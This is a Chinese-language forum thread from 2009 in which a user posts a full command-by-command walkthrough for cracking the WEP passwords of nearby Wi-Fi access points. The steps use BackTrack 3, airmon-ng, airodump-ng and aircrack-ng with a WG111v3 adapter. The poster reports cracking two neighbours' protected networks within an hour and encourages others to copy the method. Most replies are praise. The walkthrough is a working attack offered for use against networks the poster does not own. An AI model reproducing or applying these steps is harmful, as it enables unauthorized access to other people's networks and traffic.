zyl19811211 发表于 2009-4-7 16:51

WG111V3 非常简单研究学习成功

泡这个论坛时间也不少了
学习了很多前辈的经验由于我是在不懂的情况下买的这个wg111v3
所以很无奈的一直以为没法用来研究学习
只是蹭些没密码的AP
装了硬盘版bt3下载了r8187b的驱动驱动是坛里搜的有专门v3的驱动
放到bt3文件夹里

刚开始的时候看着这么多命令就觉得脑袋疼感觉肯定没戏
慢慢的 也就了解了很多
可在研究学习的时候 来回碰到这样那样的毛病 总是没法成功
基本没到过最后几个命令就没法往下进行了(总是跟坛里的前辈的经验不一样)
今天突发奇想 跳过了中间好多命令 结果成功了
我的经验就是:耐心

下面说说我研究学习的过程吧
进入bt3输入
root
toor
xconf
startx
打开bt3左下边第2个的shll窗口
在里面输入
ifconfig -a    (我这个显示是wlan0 )
ifconfig -a wlan0 11(11代表要破的通道 我是用wirelessmon 先查看好信道和mac地址的)
airmon-ng statr wlan0 11 (这个我不知道是什么意思反正我输进去了系统回应mode manitor enabled)
airodump-ng --ivs -w 123 -c 11 wlan0 (这个应该是抓包命令 123可以自己改任何名字 11还是代表信道)
以上打开的窗口不关一直等到data涨到20000左右的时候
新开一个窗口输入
aircrack-ng *.ivs   
然后提示11信道里所有ap抓到包的大小选你要破的ap 对应的 号码 输入1或2或3....回车
稍等   我电脑配置比较低等了大概2分钟密码就出来了

data涨的比较慢一定要耐心等待还有就是我这个ap的合法用户应该比较多 我想这也是这么简单就能成功的主要原因吧

wg111v3的朋友可以试试我的方法我这里只有2个带密码的ap 一小时 我用这个方法把2个都破了

zwl6600233 发表于 2009-4-7 18:47

zwl6600233 发表于 2009-4-7 18:50

wei75 发表于 2009-4-7 18:50

:funk:厉害,这样抓的包证明是有很多网卡连上去或是在下大文件才有的

zyl19811211 发表于 2009-4-7 19:04

驱动在坛里搜 wg111v3就能搜到有关的帖子了

zwmfyy 发表于 2009-4-7 19:21

哈,命令很简单啊。这样会抓一大堆的。不过后面是可以选提。在WIN就是抓很多的。

macongqq 发表于 2009-4-7 19:49

学习中···

wenxuanh 发表于 2009-4-7 20:11

我借用的网卡也是不支持注入,等了好长时间才破的。

hjjdy0758 发表于 2009-4-7 20:46

没有这个卡,学习一下!!

yanhua 发表于 2009-4-7 21:09

支持一下,功劳大的有!

yanhua 发表于 2009-4-7 21:09

我要好好学习!

zyl19811211 发表于 2009-4-8 09:54

:victory::lol
页: [1] 2
查看完整版本: WG111V3 非常简单研究学习成功